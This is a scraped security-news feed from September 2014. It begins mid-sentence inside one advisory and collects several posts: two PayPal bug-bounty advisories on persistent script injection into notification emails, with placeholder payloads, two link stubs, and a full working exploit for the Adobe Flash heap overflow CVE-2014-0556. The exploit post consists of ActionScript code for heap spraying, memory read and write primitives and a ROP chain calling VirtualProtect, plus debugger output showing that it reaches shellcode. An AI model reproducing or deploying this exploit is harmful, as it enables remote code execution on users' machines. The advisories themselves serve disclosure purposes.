Europe, PayPal also operates as a Luxembourg-based bank.

On March 17, 2010, PayPal entered into an agreement with China UnionPay (CUP), China s bankcard association, to allow Chinese consumers
to use PayPal to shop online.PayPal is planning to expand its workforce in Asia to 2,000 by the end of the year 2010.
Between December 4ñ9, 2010, PayPal services were attacked in a series of denial-of-service attacks organized by Anonymous in retaliation
for PayPal s decision to freeze the account of WikiLeaks citing terms of use violations over the publication of leaked US diplomatic cables.

(Copy of the Vendor Homepage: www.paypal.com) [http://en.wikipedia.org/wiki/PayPal]

Abstract Advisory Information:
==============================
The Vulnerability Laboratory Research Team discovered a persistent mail encoding web vulnerability in the official PayPal Inc Manager web-application.

Vulnerability Disclosure Timeline:
==================================
2014-09-23: Public Disclosure (Vulnerability Laboratory)

Discovery Status:
=================
Published

Affected Product(s):
====================
PayPal Inc
Product: Manager Application Service 2013 Q1

Exploitation Technique:
=======================
Remote

Severity Level:
===============
Medium

Technical Details & Description:
================================
A application-side mail encoding web vulnerability is detected in the official PayPal Inc Service Manager Web Application.
The vulnerability allows attackers to inject own malicious script codes on the application-side of the vulnerable service.

The persistent input validation mail encoding web vulnerability is located in the paypal manager service application.
The forward a mail function allows to send a notification to a customer. The remote attacker can inject the own code
by usage of the header text and footer text input fields. The request method to inject the malicious script code is POST.
The execution after the inject occurs in the mail header and footer section of the customer notification mail.

The security risk of the persistent web vulnerability is estimated as medium with a cvss (common vulnerability scoring system) count of 3.5.
Exploitation of the persistent web validation vulnerability requires a low privileged manager application user account with low user interaction.
Successful exploitation of the vulnerability results in persistent phishing, session hijacking, persistent external redirect and persistent
manipulation of affected or connected module context.

Request Method(s): Inject
[+] POST

Vulnerable Service(s):
[+] PayPal Inc - Manager Application Service

Vulnerable Module(s):
[+] Service Settings > Recurring Billing > Customer EMail

Vulnerable Parameter(s):
[+] Header Text
[+] Footer Text

Affected Module(s):
[+] Customer Notification Mail (Web Server)

Proof of Concept (PoC):
=======================
The vulnerability can be exploited by remote attackers with low privileged paypal inc manager web-application user account and low user interaction.
For security demonstration or to reproduce the security vulnerability follow the provided information and steps below to continue.

Manual steps to reproduce the vulnerability ...

1. Register a paypal user account
2. Activate the account to the manager portal service
3. Login to the portal
4. Open the following website section module Service Settings > Recurring Billing > Customer EMail
5. Include to the headertext and footertext inputs your own malicious script code and save the input to interact
6. All customers that are linked with the account get the paypal manager service notification mail
Note: The execution of the script code occurs in the header text and footer text output context
7. Successful reproduce of the vulnerability!

PoC: Listing - Customer EMail

<table>
<thead>
<tr>
<th colspan="2">Receipt and Transaction Report Email</th>
</tr>
</thead>
<tbody><tr>
<th><input checked="checked" name="emailReceipt" value="Y" onclick="showAlert()" type="checkbox"></th>
<td>Email Receipt to Customers</td>
</tr>
<tr>
<th> <input checked="checked" name="emailOptional" value="Y" type="checkbox"></th>
<td>Email Optional Transaction Report to Customers</td>
</tr>
<tr>
<th><span class="requiredField" id="redstar1" name="redstar1" style="display: none;">*</span> Receipt # Sender:</th>
<td><input name="receiptSender" type="text">
</td>
</tr>
<tr>
<th>Header Text:</th>
<td><textarea name="headerText1">-%20">"<[INJECT PERSISTENT SCRIPT CODE HERE!]><>"<

Solution - Fix & Patch:
=======================
The vulnerability can be patched by a secure parse and encode of the vulnerable header text and footer text input fields.
Encode the already stored information to prevent further executions through already saved malicious payloads.

Security Risk:
==============
The security risk of the persistent input validation web vulnerability in the forward a mail service is estimated as medium.

Credits & Authors:
==================
Vulnerability Laboratory [Research Team] - Benjamin Kunz Mejri (bkm@evolution-sec.com) [www.vulnerability-lab.com]

Disclaimer & Information:
=========================
The information provided in this advisory is provided as it is without any warranty. Vulnerability Lab disclaims all warranties, either
expressed or implied, including the warranties of merchantability and capability for a particular purpose. Vulnerability-Lab or its suppliers
are not liable in any case of damage, including direct, indirect, incidental, consequential loss of business profits or special damages, even
if Vulnerability-Lab or its suppliers have been advised of the possibility of such damages. Some states do not allow the exclusion or limitation
of liability for consequential or incidental damages so the foregoing limitation may not apply. We do not approve or encourage anybody to break
any vendor licenses, policies, deface websites, hack into databases or trade with fraud/stolen material.

Domains:   www.vulnerability-lab.com - www.vuln-lab.com - www.evolution-sec.com
Contact:   admin@vulnerability-lab.com - research@vulnerability-lab.com - admin@evolution-sec.com
Section:   dev.vulnerability-db.com - forum.vulnerability-db.com - magazine.vulnerability-db.com
Social: twitter.com/#!/vuln_lab - facebook.com/VulnerabilityLab - youtube.com/user/vulnerability0lab
Feeds:   vulnerability-lab.com/rss/rss.php - vulnerability-lab.com/rss/rss_upcoming.php - vulnerability-lab.com/rss/rss_news.php
Programs: vulnerability-lab.com/submit.php - vulnerability-lab.com/list-of-bug-bounty-programs.php - vulnerability-lab.com/register/

Any modified copy or reproduction, including partially usages, of this file requires authorization from Vulnerability Laboratory. Permission to
electronically redistribute this alert in its unmodified form is granted. All other rights, including the use of other media, are reserved by
Vulnerability-Lab Research Team or its suppliers. All pictures, texts, advisories, source code, videos and other information on this website
is trademark of vulnerability-lab team & the specific authors or managers. To record, list (feed), modify, use or edit our material contact
(admin@vulnerability-lab.com or research@vulnerability-lab.com) to get a permission.

Copyright © 2014 | Vulnerability Laboratory [Evolution Security]

↧

PayPal Inc Bug Bounty #59 - Persistent Mail Encoding Vulnerability

September 30, 2014, 8:10 am

≫ Next: Five Anti-Analysis Tricks That Sometimes Fool Analysts

≪ Previous: PayPal Inc Bug Bounty #71 PPM - Persistent Filter Vulnerability

Document Title:
===============
PayPal Inc Bug Bounty #59 - Persistent Mail Encoding Vulnerability

References (Source):
====================
http://www.vulnerability-lab.com/get_content.php?id=844

PayPal Security UID: CabdfGa

Release Date:
=============
2014-09-23

Vulnerability Laboratory ID (VL-ID):
====================================
844

Common Vulnerability Scoring System:
====================================
3.5

Product & Service Introduction:
===============================
PayPal is a global e-commerce business allowing payments and money transfers to be made through the Internet. Online money
transfers serve as electronic alternatives to paying with traditional paper methods, such as checks and money orders. Originally,
a PayPal account could be funded with an electronic debit from a bank account or by a credit card at the payer s choice. But some
time in 2010 or early 2011, PayPal began to require a verified bank account after the account holder exceeded a predetermined
spending limit. After that point, PayPal will attempt to take funds for a purchase from funding sources according to a specified
funding hierarchy. If you set one of the funding sources as Primary, it will default to that, within that level of the hierarchy
(for example, if your credit card ending in 4567 is set as the Primary over 1234, it will still attempt to pay money out of your
PayPal balance, before it attempts to charge your credit card). The funding hierarchy is a balance in the PayPal account; a
PayPal credit account, PayPal Extras, PayPal SmartConnect, PayPal Extras Master Card or Bill Me Later (if selected as primary
funding source) (It can bypass the Balance); a verified bank account; other funding sources, such as non-PayPal credit cards.
The recipient of a PayPal transfer can either request a check from PayPal, establish their own PayPal deposit account or request
a transfer to their bank account.

PayPal is an acquirer, performing payment processing for online vendors, auction sites, and other commercial users, for which it
charges a fee. It may also charge a fee for receiving money, proportional to the amount received. The fees depend on the currency
used, the payment option used, the country of the sender, the country of the recipient, the amount sent and the recipient s account
type. In addition, eBay purchases made by credit card through PayPal may incur extra fees if the buyer and seller use different currencies.

On October 3, 2002, PayPal became a wholly owned subsidiary of eBay. Its corporate headquarters are in San Jose, California, United
States at eBay s North First Street satellite office campus. The company also has significant operations in Omaha, Nebraska, Scottsdale,
Arizona, and Austin, Texas, in the United States, Chennai, Dublin, Kleinmachnow (near Berlin) and Tel Aviv. As of July 2007, across
Europe, PayPal also operates as a Luxembourg-based bank.

On March 17, 2010, PayPal entered into an agreement with China UnionPay (CUP), China s bankcard association, to allow Chinese consumers
to use PayPal to shop online.PayPal is planning to expand its workforce in Asia to 2,000 by the end of the year 2010.
Between December 4ñ9, 2010, PayPal services were attacked in a series of denial-of-service attacks organized by Anonymous in retaliation
for PayPal s decision to freeze the account of WikiLeaks citing terms of use violations over the publication of leaked US diplomatic cables.

(Copy of the Vendor Homepage: www.paypal.com) [http://en.wikipedia.org/wiki/PayPal]

Abstract Advisory Information:
==============================
The Vulnerability Laboratory Research Team discovered in the official PayPal Inc Bill Later finance marketing service.

Vulnerability Disclosure Timeline:
==================================
2014-09-22: Public Disclosure (Vulnerability Laboratory)

Discovery Status:
=================
Published

Affected Product(s):
====================
PayPal Inc
Product: BillMeLater - Finance & Marketing Service 2013 Q1

Exploitation Technique:
=======================
Remote

Severity Level:
===============
Medium

Technical Details & Description:
================================
A persistent mail encoding web vulnerability has been discovered in the official PayPal Inc Bill Later finance marketing service.
The vulnerability allows an attacker to inject own malicious script codes on the application-side of the affected service module.

The persistent input validation mail encoding web vulnerability is located in the `name` value of the vulnerable help submit form.
The attacker can send a POST method request with manipulated values through the help form application module to compromise the
context of outgoign web-server mails. After the the request has been send an automatic reply arrives at the included inbox with
the manipulated mail context of the successful help request ago. The script code execution occurs in the header section of the
mail next to the introduction word `Hello [Name]`.

The security risk of the persistent web vulnerability is estimated as medium with a cvss (common vulnerability scoring system) count of 3.5.
Exploitation of the application-side vulnerability requires no privileged application user account and low or medium user interaction.
Successful exploitation of the vulnerability results in session hijacking, persistent phishing, persistent external redirect to malicious
sources or persistent manipulation of affected or connected module context.

Request Method(s):
[+] POST

Vulnerable Module(s):
[+] PayPal Inc - BillMeLater (Apply)

Vulnerable Form(s):
[+] ppfinportal > helpCenter > contact form

Vulnerable Parameter(s):
[+] Name
[+] Message

Affected Module(s):
[+] Notification Mail (Web Server) [DL-BML-MerchantPortalFeedback@ebay.com]

Proof of Concept (PoC):
=======================
The persistent vulnerability can be exploited by remote attackers with low privileged application user account and low required user interaction.
For security demonstration or to reproduce the security vulnerability follow the provided information and steps below to continue.

--- PoC Session Logs [POST] ---
org.codehaus.groovy.grails.SYNCHRONIZER_TOKEN=e2a2492c-c330-43b2-80f1-65527e5f228e
org.codehaus.groovy.grails.SYNCHRONIZER_URI=
%2Fppfinportal%2FhelpCenter
name=Benjamin+Mejri+<>%20"><[PERSISTENT INJECTED SCRIPT CODE!]") <
email=admin%40vulnerability-lab.com
topic=GQ
message=ben+<>%20"><[PERSISTENT INJECTED SCRIPT CODE!]") <
contact_submit=Send+Message

Reference(s):
https://financing.paypal.com/ppfinportal/helpCenter#contact
https://financing.paypal.com/ppfinportal/helpCenter/messageSent

Solution - Fix & Patch:
=======================
The vulnerability can be patched by a secure encode and parse of the name input values.
Restrict the input and disallow special chars and script code tags.
Filter the web-server mail notification with a proxy mechanism to prevent persistent script code executions in the header of outgoing service emails.

Security Risk:
==============
The security risk of the application-side mail encoding input validation web vulnerability is estimated as medium with a cvss of 3.5.

Credits & Authors:
==================
Vulnerability Laboratory [Research Team] - Benjamin Kunz Mejri (bkm@evolution-sec.com) [www.vulnerability-lab.com]

Disclaimer & Information:
=========================
The information provided in this advisory is provided as it is without any warranty. Vulnerability Lab disclaims all warranties, either
expressed or implied, including the warranties of merchantability and capability for a particular purpose. Vulnerability-Lab or its suppliers
are not liable in any case of damage, including direct, indirect, incidental, consequential loss of business profits or special damages, even
if Vulnerability-Lab or its suppliers have been advised of the possibility of such damages. Some states do not allow the exclusion or limitation
of liability for consequential or incidental damages so the foregoing limitation may not apply. We do not approve or encourage anybody to break
any vendor licenses, policies, deface websites, hack into databases or trade with fraud/stolen material.

Domains:   www.vulnerability-lab.com - www.vuln-lab.com - www.evolution-sec.com
Contact:   admin@vulnerability-lab.com - research@vulnerability-lab.com - admin@evolution-sec.com
Section:   dev.vulnerability-db.com - forum.vulnerability-db.com - magazine.vulnerability-db.com
Social: twitter.com/#!/vuln_lab - facebook.com/VulnerabilityLab - youtube.com/user/vulnerability0lab
Feeds:   vulnerability-lab.com/rss/rss.php - vulnerability-lab.com/rss/rss_upcoming.php - vulnerability-lab.com/rss/rss_news.php
Programs: vulnerability-lab.com/submit.php - vulnerability-lab.com/list-of-bug-bounty-programs.php - vulnerability-lab.com/register/

Any modified copy or reproduction, including partially usages, of this file requires authorization from Vulnerability Laboratory. Permission to
electronically redistribute this alert in its unmodified form is granted. All other rights, including the use of other media, are reserved by
Vulnerability-Lab Research Team or its suppliers. All pictures, texts, advisories, source code, videos and other information on this website
is trademark of vulnerability-lab team & the specific authors or managers. To record, list (feed), modify, use or edit our material contact
(admin@vulnerability-lab.com or research@vulnerability-lab.com) to get a permission.

Copyright © 2014 | Vulnerability Laboratory [Evolution Security]

↧

Five Anti-Analysis Tricks That Sometimes Fool Analysts

September 30, 2014, 3:32 pm

≫ Next: Adobe Flash 14.0.0.145 copyPixelsToByteArray() Heap Overflow

≪ Previous: PayPal Inc Bug Bounty #59 - Persistent Mail Encoding Vulnerability

No malware author wants an analyst snooping around their code, so they employ tricks to inhibit analysis.

Along with visualization technology like VMware, debuggers are also targeted by malware. This is because if a debugger is attached to the running malware, it’s more than likely being analyzed.

While nothing presented here is really new, it might help you to identify what’s happening if you find yourself in one of these traps.

more here...........https://blog.malwarebytes.org/intelligence/2014/09/five-anti-debugging-tricks-that-sometimes-fool-analysts/

↧

Adobe Flash 14.0.0.145 copyPixelsToByteArray() Heap Overflow

September 30, 2014, 3:37 pm

≫ Next: A secure and private browser sandbox

≪ Previous: Five Anti-Analysis Tricks That Sometimes Fool Analysts

/*
<html>
<head>
<title>CVE-2014-0556</title>
</head>
<body>
<object id="swf" width="100%" height="100%" data="NewProject.swf" type="application/x-shockwave-flash"></object><br>
<button onclick="swf.exploit()">STOP</button>
</body>
</html>
*/
/*
(1728.eb0): Break instruction exception - code 80000003 (first chance)
eax=00000001 ebx=00000201 ecx=08d62fe8 edx=76ee70f4 esi=599dd83f edi=59a31984
eip=08d63048 esp=08d63048 ebp=5a55a3a8 iopl=0 nv up ei pl nz na po nc
cs=001b ss=0023 ds=0023 es=0023 fs=003b gs=0000 efl=00200202
08d63048 cc int 3
1:020> dd esp l4
08d63048 cccccccc cccccccc cccccccc cccccccc
1:020> t
eax=00000001 ebx=00000201 ecx=08d62fe8 edx=76ee70f4 esi=599dd83f edi=59a31984
eip=08d63049 esp=08d63048 ebp=5a55a3a8 iopl=0 nv up ei pl nz na po nc
cs=001b ss=0023 ds=0023 es=0023 fs=003b gs=0000 efl=00200202
08d63049 cc int 3
1:020> t
eax=00000001 ebx=00000201 ecx=08d62fe8 edx=76ee70f4 esi=599dd83f edi=59a31984
eip=08d6304a esp=08d63048 ebp=5a55a3a8 iopl=0 nv up ei pl nz na po nc
cs=001b ss=0023 ds=0023 es=0023 fs=003b gs=0000 efl=00200202
08d6304a cc int 3
1:020> t
eax=00000001 ebx=00000201 ecx=08d62fe8 edx=76ee70f4 esi=599dd83f edi=59a31984
eip=08d6304b esp=08d63048 ebp=5a55a3a8 iopl=0 nv up ei pl nz na po nc
cs=001b ss=0023 ds=0023 es=0023 fs=003b gs=0000 efl=00200202
08d6304b cc int 3
1:020> t
eax=00000001 ebx=00000201 ecx=08d62fe8 edx=76ee70f4 esi=599dd83f edi=59a31984
eip=08d6304c esp=08d63048 ebp=5a55a3a8 iopl=0 nv up ei pl nz na po nc
cs=001b ss=0023 ds=0023 es=0023 fs=003b gs=0000 efl=00200202
08d6304c cc int 3
*/
package
{
import flash.events.*
import flash.media.*
import flash.display.*
import flash.geom.*
import flash.utils.*
import flash.text.*
import flash.external.ExternalInterface

public class Main extends Sprite {
private var i0:uint
private var i1:uint
private var i2:uint
private var i3:uint
private var str:String = new String("CVE: CVE-2014-0556\nAuthor: hdarwin (@hdarwin89)\nTested on: Win7 SP1 x86 & Flash 14.0.0.145")
private var ba:Vector.<ByteArray> = new Vector.<ByteArray>(3200)
private var ob:Vector.<Object> = new Vector.<Object>(6400)
private var bitmap:BitmapData = new BitmapData(0x100, 4, true, 0xffffffff)
private var rect:Rectangle = new Rectangle(0, 0, 0x100, 4)
private var snd:Sound
private var vector:uint
private var vtable:uint
private var flash:uint
public function Main():void {

for (i0 = 0; i0 < 3200; i0++) {
ba[i0] = new ByteArray()
ba[i0].length = 0x2000
ba[i0].position = 0xfffff000
}

for (i0 = 0; i0 < 3200; i0++) {
if (i0 % 2 == 0) ba[i0] = null
ob[i0 * 2] = new Vector.<uint>(1008)
ob[i0 * 2 + 1] = new Vector.<uint>(1008)
}

bitmap.copyPixelsToByteArray(rect, ba[1601])

for (i0 = 0; ; i0++)
if (ob[i0].length != 1008) break

ob[i0][1024 * 3 - 2] = 0xffffffff

for (i1 = 0; ; i1++) {
if (i0 == i1) continue
if (ob[i1].length != 1008) break
}

ob[i1][0xFFFFFFFE - 1024 * 3] = 0xffffffff
ob[i1][0xFFFFFFFE - 1024 * 3 + 1] = ob[i0][1024 * 3 - 1]
ob[i0].fixed = true

for (i2 = 1000; ; i2++) {
if (ob[i1][0xFFFFFFFF - i2 + 0] == 0 && ob[i1][0xFFFFFFFF - i2 + 10] == 1 && ob[i1][0xFFFFFFFF - i2 + 5] == ob[i1][0xFFFFFFFF - i2 + 15]) {
vector = ob[i1][0xFFFFFFFF - i2 + 11]
break
} else if (ob[i1][i2 + 0] == 0 && ob[i1][i2 + 10] == 1 && ob[i1][i2 + 5] == ob[i1][i2 + 15]) {
vector = ob[i1][i2 + 11]
break
}
}

snd = new Sound()

for (i2 = 0; i2 < 6400; i2++) {
if (i2 == i0 || i2 == i1) continue
ob[i2] = null
ob[i2] = new Vector.<Object>(1014)
ob[i2][0] = snd
ob[i2][1] = snd
}

for (i2 = 0; ; i2++) {
if (ob[i0][i2 + 0] == 1014 &&
ob[i0][i2 + 1] == ob[i0][i2 + 2] &&
ob[i0][i2 + 3] == 1
) {
vtable = read(ob[i0][i2 + 1] - 1)
flash = vtable - 0x00c3c1e8 // Flash32_14_0_0_145.ocx
write(ob[i0][i2 + 1] - 1, vector + 0xf54)
for (i3 = 0; i3 < 1008; i3++) {
ob[i0][i3] = 0x41414100 | i3
}
ob[i0][0] = flash + 0x004d6c50 // POP EBP # RETN
ob[i0][1] = flash + 0x004d6c50 // skip 4 bytes
ob[i0][2] = flash + 0x00a21b36 // POP EBX # RETN
ob[i0][3] = 0x00000201 // 0x00000201
ob[i0][4] = flash + 0x008ec368 // POP EDX # RETN
ob[i0][5] = 0x00000040 // 0x00000040
ob[i0][6] = flash + 0x00691119 // POP ECX # RETN
ob[i0][7] = vector + 2000 // Writable location
ob[i0][8] = flash + 0x005986d2 // POP EDI # RETN
ob[i0][9] = flash + 0x00061984 // RETN (ROP NOP)
ob[i0][10] = flash + 0x001bf342 // POP ESI # RETN
ob[i0][11] = flash + 0x0000d83f // JMP [EAX]
ob[i0][12] = flash + 0x000222b5 // POP EAX # RETN
ob[i0][13] = flash + 0x00b8a3a8 // ptr to VirtualProtect()
ob[i0][14] = flash + 0x00785916 // PUSHAD # RETN
ob[i0][15] = flash + 0x0017b966 // ptr to 'jmp esp'
ob[i0][16] = 0xcccccccc // shellcode
ob[i0][17] = 0xcccccccc // shellcode
ob[i0][18] = 0xcccccccc // shellcode
ob[i0][19] = 0xcccccccc // shellcode
ob[i0][979] = flash + 0x0029913A // POP EAX # RETN
ob[i0][980] = 0x00000f58
ob[i0][981] = flash + 0x00195558 // PUSH ESP # POP ESI # RETN
ob[i0][982] = flash + 0x0036B3B2 // SUB ESI,EAX # POP ECX # MOV EAX,ESI # POP ESI # RETN
ob[i0][985] = flash + 0x0095024c // XCHG EAX,ESP # RETN
ob[i0][1007] = flash + 0x0095024c // XCHG EAX,ESP # RETN
break
}
}

ob[i1][0xFFFFFFFE - 1024 * 3] = 4096
ob[i0][1024 * 3 - 2] = 0
str += flash.toString(16)
var tf:TextField = new TextField(); tf.width = 800; tf.height = 800; tf.text = str; addChild(tf)

if (ExternalInterface.available) ExternalInterface.addCallback("exploit", exploit)
}

private function write(addr:uint, data:uint):void {
ob[i0][(addr - vector) / 4 - 2] = data
}

private function read(addr:uint):uint {
return ob[i0][(addr - vector) / 4 - 2]
}

private function zeroPad(number:String, width:int):String {
if (number.length < width)
return "0" + zeroPad(number, width-1)
return number
}

public function exploit():void {
snd.toString()
}
}
}

Authored by hdarwin

//The information contained within this publication is
//supplied "as-is"with no warranties or guarantees of fitness
//of use or otherwise. Bot24, Inc nor Bradley Sean Susser accepts
//responsibility for any damage caused by the use or misuse of
//this information

↧

A secure and private browser sandbox

September 30, 2014, 4:22 pm

≫ Next: Fynloski dropper and .NET PWS (pass stealer) Analysis

≪ Previous: Adobe Flash 14.0.0.145 copyPixelsToByteArray() Heap Overflow

A patchwork set of standards and rules is creating an unsafe web. Cross-site attacks are too common and privacy leaks have become the norm. There’s no reason it has to be like this. In this article I propose a sandbox approach as a base to a better model.

more here.............http://mortoray.com/2014/09/30/a-secure-and-private-browser-sandbox/

↧